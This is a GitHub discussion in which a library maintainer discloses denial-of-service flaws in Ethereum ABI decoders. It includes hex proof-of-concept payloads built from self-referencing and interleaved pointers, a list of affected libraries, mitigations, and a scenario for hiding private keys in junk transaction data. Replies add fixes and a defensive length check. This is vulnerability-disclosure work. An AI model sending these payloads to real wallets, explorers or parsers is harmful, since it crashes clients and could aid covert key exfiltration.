ZSTs, ABIs, stolen keys and broken legs #20

paulmillr · 2024-01-18T09:23:27Z

paulmillr
Jan 18, 2024
Maintainer

ZST is a new attack on ETH ABI parsers. It's low priority since it only causes Denial of Service - there is no Remote Code Execution.

Unfortunately, micro-eth-signer was partially affected. Unexepectedly, ethers.js was fine.

You break my parser - I break your ~~legs~~ parser

Our parser was broken. How about we take the offensive and break all other parsers?

What's ABI?

ABI (Application Binary Interface) is computer-friendly "documentation" for Ethereum smart contracts. An account wishing to use a smart contract's function uses the ABI to hash the function definition, so it can create the EVM bytecode required to call the function. micro-eth-signer is a tiny JS library, which interacts with transactions and smart contracts, so, ABI parsing is present. Underneath, it uses micro-packed, a very cool lib for handling binary data.

As an example, here's a part of Uniswap ABI:

{
  "type": "function",
  "name": "getReserves",
  "outputs": [
    { "name": "reserve0", "type": "uint112" },
    { "name": "reserve1", "type": "uint112" },
    { "name": "blockTimestampLast", "type": "uint32" }
  ]
}

Recursion

Ethereum ABI has pointers, which means we can cause cycles by creating pointer which refers to itself: e.g. 32-byte 0000000000000000000000000000000000000000000000000000000000000000
ABI pointers are unsigned 256-bit integers. So much efficiency!
There are no pointers in ABI definition, they are auto-created for dynamic structures
You can't define recursive structure in ABI definition. Meaning, a long chain of pointers will require long definition: O(N) complexity
However, we have dynamic arrays, which is by default, under pointers
If we can create an array which consists of itself, we can cause DoS by combinatorial explosion

Suppose, we have the array of [[], []]. Now if we replace all internal arrays with global array, we can create circular reference:

const a = [[], []];
console.log("a", a);
a[0] = a;
a[1] = a;

console.log("a[a]", a);

which outputs:

a[([], [])];
a[a] <ref *1> [[Circular *1], [Circular *1]];

JS is smart enough to catch this. But what about ABI parsers?

Tricking a parser

If we can create an array of two elements which references itself, we can add [][][][][] (depth=5) to definition, and it will create 2**5 arrays.

An array starts with a pointer. The structure looks like [u256(ptr), u256(arrayLen), ...u256(elements)]. Which means an actual array starts at '0x20' (or 32 bytes, same as ptr in first 32 bytes).

To act as a pointer, all array values should be equal to this ptr. Let's look at the result:

const payload =
  '0000000000000000000000000000000000000000000000000000000000000020' + // main array ptr
  '0000000000000000000000000000000000000000000000000000000000000002' + // main array length (2 elements)
  '0000000000000000000000000000000000000000000000000000000000000020' + // first array element (acts as ptr to array itself)
  '0000000000000000000000000000000000000000000000000000000000000020'; // second array element

const results = {
  'uint256[]': [32n, 32n],
  // Now we see basic explosion: decoded result takes significantly more memory than input
  // NOTE: each 0n is 32 bytes
  'uin256[][]': [
    [
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n
    ],
    [
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n,
      0n, 0n, 0n, 0n, 0n, 0n, 0n, 0n
    ],
  ],
  'uint256[][][]': [
    [
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], []
    ],
    [
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], [],
      [], [], [], [], [], [], [], []
    ],
  ],
};

The result is unexpected:

Instead of 32n, there is 0n in nested arrays
Array size is 32 instead of 2

The reason this happens is the fact ETH ABI has "nested" pointers, which feels like a poor man's attempt to fight recursive pointers. All pointers have absolute position inside of a scope, but whenever pointer is dereferenced, it creates a new scope:

let data = new Uint8Array([1, 2, 3, 4]);
const ptr = data[0];
const scope = data.subarray(ptr);
decode(scope, inner);

Why it is bad? (most things in ETH spec are bad, just look at those 256-bit pointers)

You can easily disable loops by enforcing that ptr points to data after pointer only (or before, but should be same for all pointers), this will mean that no ptr can point to any previous data and next pointer in array cannot use same data as previous. Most libraries already construct stuff in a way the check works. There can be some compat issues with something obscure.

Scopes try to do the same, but in significantly more complicated way. Scopes can be better for compression, at the cost of DoS attacks.

This also means pointers (0x20) will point at first element instead of 'count'. Scopes -> every element in array of pointers can point to same data.

Which means, we can create array of N elements by encoding only single element. Furthermore, we can create nested elements which will "spend" only single pointer on depth level. ethers check tries to fix this bug, but it only requires to add 32 more pointers to input.

Proof of concept

const payload =
  "0000000000000000000000000000000000000000000000000000000000000020" +
  "000000000000000000000000000000000000000000000000000000000000000a" +
  "0000000000000000000000000000000000000000000000000000000000000020".repeat(64);

// // smaller
// const payload =
//   '0000000000000000000000000000000000000000000000000000000000000020' +
//   '000000000000000000000000000000000000000000000000000000000000000a' +
//   '0000000000000000000000000000000000000000000000000000000000000020'.repeat(10) +
//   '0000000000000000000000000000000000000000000000000000000000000000'.repeat(32);

// even smaller!
// const payload =
//   '0000000000000000000000000000000000000000000000000000000000000020' +
//   '0000000000000000000000000000000000000000000000000000000000000005' +
//   '0000000000000000000000000000000000000000000000000000000000000020'.repeat(6) +
//   '0000000000000000000000000000000000000000000000000000000000000000'.repeat(32);

const ethers = require("ethers").AbiCoder.defaultAbiCoder();
const { throws } = require("node:assert");

throws(() =>
  ethers.decode(["uint256[][][][][][][][][][]"], Buffer.from(payload, "hex")),
);
throws(() =>
  ethers.decode(["bytes[][][][][][][][][][]"], Buffer.from(payload, "hex")),
);

Now, all zero users of our library can feel secure!

Results

ethereumjs-abi (js, 0.6.8)
- ZST: crashes
- Recursive: crashes
Ethers (js, 6.9.2)
- ZST: ok
- Recursive: crashes
eth-abi (python)
- ZST: ok
  - Was fixed, assumed moderate severity, "no need for bounty"
- Recursive: crashes (takes a while to eat all memory, 1h for 59gb, very inefficient!)
ethers.rs (rust, unrelated to original ethers.js)
- Deprecated in favor of alloy-rs
- ZST: crashes
- Recursive: ??? (hard api to test)
Alloy-rs (rust)
- ZST: ok
- non ZST big arrays (ZST payload with uint32[1][]): eats all memory (LOL!)
- recursive: eats all memory
viem (js, 2.0.0)
- ZST: crashes
- Recursive: crashes
micro-eth-signer
- ZST: fixed now
- Recursive: was cool from the beginning. Who is vulnerable now?

More bugs

We've crashed all popular libraries. Let's try to crash micro-eth-signer now. Payload will be surprisingly easy:

Create an array of pointers. Each of them would point to an array after the current one. Add simple array of values in the end:

const arr10 = abi.mapComponent(unwrapTestType("uint256[][][][][][][][][][]"));
const a = [[], [], [], [], [], [], [], [], [], []];
const ptrArr = abi.mapComponent(unwrapTestType("uint256[]"));
const mainPtr = hex.encode(
  ptrArr.encode(a.map((i) => BigInt(a.length - i + 1) * 32n)),
);
console.log("TTT", arr10.decode(hex.decode(mainPtr.repeat(10 + 1))));

Payload will be larger than previous one, but it will bypass our checks.

Pointers are hard! You can encode very complex structures without pointers: look at micro-packed and ed25519-keygen's PGP implementation.

It was fixed by prohibiting de-referencing pointer to same address more than once. Check out micro-packed source code.

Interleave

We are secure now. Right? Did I tell you that pointers are hard? Basically, if one encoded byte can be used twice in output, DoS can happen.

Let's look at arrays. 10 elements array, will be represented as len(10)[9, 8, 7, ...] By construction when parsed as uint256[][] will create arrays:

len(10)[9, 8, 7, ...]
len(9)[8, 7, 6, 5, ...]
len(8)[7, 6, 5, ...]
...

This should create size explosion N -> N**2/2.

Elements are pointers, so they should point on specific element of array.

[32, 64, 96, 128, ...] -> last element is big and will require a lot of padding
What if we reverse order? [128, 96, 64, 32] -> elem will need roughly half of biggest array as padding
Unaligned pointer read is impossible: elements will be too big (requires huge padding, because it is U32 max)

The result:

Length	Expected	Result	+
4	6KB	6KB	0x
8	15KB	30KB	1x
16	30KB	123KB	3x
32	63KB	510KB	7x
64	129KB	2MB	15x
128	260KB	8MB	31x
256	522KB	33MB	63x
512	1MB	133MB	127x
1024	2MB	533MB	255x
2048	4MB	2GB	511x
4096	8MB	crash	1023x

This is in hex, byte size is 2x smaller. Check out code in abi.test.js.

Mitigation

How can the errors be fixed?

Quick-and-dirty: limit input size and pray that nobody finds PoC with higher explosion coefficient
Suboptimal: disable nested arrays. Unclear if it will help, but tokens/NFT api doesn't use arrays. Uniswap only uses plain arrays. Can break complex cases. Provides no guarantees there is a way to trigger same without them, as long as pointers involved
Correct: ensure every byte was read only once during decoding.
- Complicated to implement. Maybe just switch to micro-packed of ours?
- Allows finding unread bytes, which also solves junk-data problem
- Significantly reduces chance of expansion-related DoS

Stealing keys with junk data

If there are any pointers in encoding, libraries won't catch additional data in it. When looking into all transactions, there was a real uniswap tx with injected data. micro-eth-signer catched it, other libraries didn't.

On a first glance, this could be used for fingerprinting. A bad client will be able to inject IP or UUID to all transactions. Bad, but not too bad.

However, suppose, we have a cold wallet which is airgapped and can't access a network. Transactions are transferred by manually copying / typing every tx byte. With junk data, wallet could inject private keys into transactions with ABI calls. Moreover, the keys could be encrypted. All ABI decoding libraries won't see it, so, a user would assume the tx is safe. An attacker, however, would be able to parse the blockchain, find TXs.

How can this be mitigated? One way is doing a round-trip of encode(decode(data)). Differences would be shown, however, a spec doesn't force anything related to pointers and value positions. Any significantly different parser would create a lot of false-positives. Another way is using micro-eth-signer. Whenever it's necessary to parse an unsafe tx, ptrArr.decode(p, { allowUnreadBytes: true }) could be used. For PoC, take a glance at our abi.test.js

Conclusion

ETH nodes are safe: ETH ABI is not stored on-chain, and nodes don't parse ABIs.

Block explorers and wallets are affected, whenever they touch ABIs.

As for bad events:

Find an ABI / spec with arrays in definition
Send public events with payload to blockchain
Crash all clients which watch specific wallets
Tokens / NFTs look safe. Does an API with arrays even exist?
No need to parse unsafe ABI at all

Status as per Jan 18, 2024:

Ethers, Viem - fixed
Others: notified / not fixed

Thanks to Viem for offering a reward for the finding.

hazae41 · 2024-01-18T12:50:34Z

hazae41
Jan 18, 2024

Thanks for the report, I fixed it in Cubane (it did infinite loop)

Maybe there is an issue there

a.map((i) => BigInt(a.length - i + 1) * 32n)

https://github.com/paulmillr/micro-eth-signer/blob/9ccd3def6af06799214656a58b20cef4ca544c44/test/abi.test.js#L1681C39-L1681C39

It should be (_,i) instead of (i)?

1 reply

paulmillr Jan 18, 2024
Maintainer Author

Yes. Fixed now.

Academy312 · 2024-01-29T11:38:13Z

Academy312
Jan 29, 2024

thx

0 replies

kryptokisa · 2024-02-02T15:52:38Z

kryptokisa
Feb 2, 2024

спасибо

0 replies

esaulpaugh · 2024-09-15T17:46:52Z

esaulpaugh
Sep 15, 2024

I haven't been able to get headlong to misbehave. I added a decoded array length limit in August 2020 and currently I decode array lengths as uint21 (with validation, largest accepted array is length 2^21 -1).

So I either get something like

java.lang.IllegalArgumentException: array index 0: unsigned val exceeds bit limit: 76 > 21 (from my integer decode validation)

or

java.nio.BufferUnderflowException (end of input reached unexpectedly; from Java ByteBuffer)

or

java.lang.IllegalArgumentException: not enough bytes remaining: 96 < 1024 (from my array decoding code)

The last one is generated by calculating the minimum possible byte length for the array:

 /**
  * Abort early if the input is obviously too short. Best effort to fail fast before allocating memory for the array.
  */
  private void checkNoDecodePossible(final int remaining, final int arrayLen) {
      final int minByteLen = !dynamic
                              ? headLength
                              : elementType.dynamic
                                  ? arrayLen * OFFSET_LENGTH_BYTES
                                  : !(elementType instanceof ByteType)
                                      ? arrayLen * elementType.headLength()
                                      : (flags & ABIType.FLAG_LEGACY_DECODE) != 0
                                          ? arrayLen
                                          : Integers.roundLengthUp(arrayLen, UNIT_LENGTH_BYTES);
      if (remaining < minByteLen) {
          throw new IllegalArgumentException("not enough bytes remaining: " + remaining + " < " + minByteLen);
      }
  }

Maybe this will help somebody.

Also, headlong supports backwards offset jumps and maybe checkNoDecodePossible will throw for some really funky encodings even though they might be legal and spec-compliant (I try to allow everything the spec allows). But nobody has complained about this code wrongly rejecting anything yet.

0 replies

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

ZSTs, ABIs, stolen keys and broken legs #20

{{title}}

{{editor}}'s edit

{{editor}}'s edit

Replies: 4 comments 1 reply

{{title}}

{{title}}

{{title}}

{{title}}

{{title}}

{{editor}}'s edit

{{editor}}'s edit

Select a reply

ZSTs, ABIs, stolen keys and broken legs #20

paulmillr Jan 18, 2024 Maintainer

What's ABI?

Recursion

Tricking a parser

Proof of concept

Results

More bugs

Interleave

Mitigation

Stealing keys with junk data

Conclusion

Replies: 4 comments · 1 reply

hazae41 Jan 18, 2024

paulmillr Jan 18, 2024 Maintainer Author

Academy312 Jan 29, 2024

kryptokisa Feb 2, 2024

esaulpaugh Sep 15, 2024

paulmillr
Jan 18, 2024
Maintainer

Replies: 4 comments 1 reply

hazae41
Jan 18, 2024

paulmillr Jan 18, 2024
Maintainer Author

Academy312
Jan 29, 2024

kryptokisa
Feb 2, 2024

esaulpaugh
Sep 15, 2024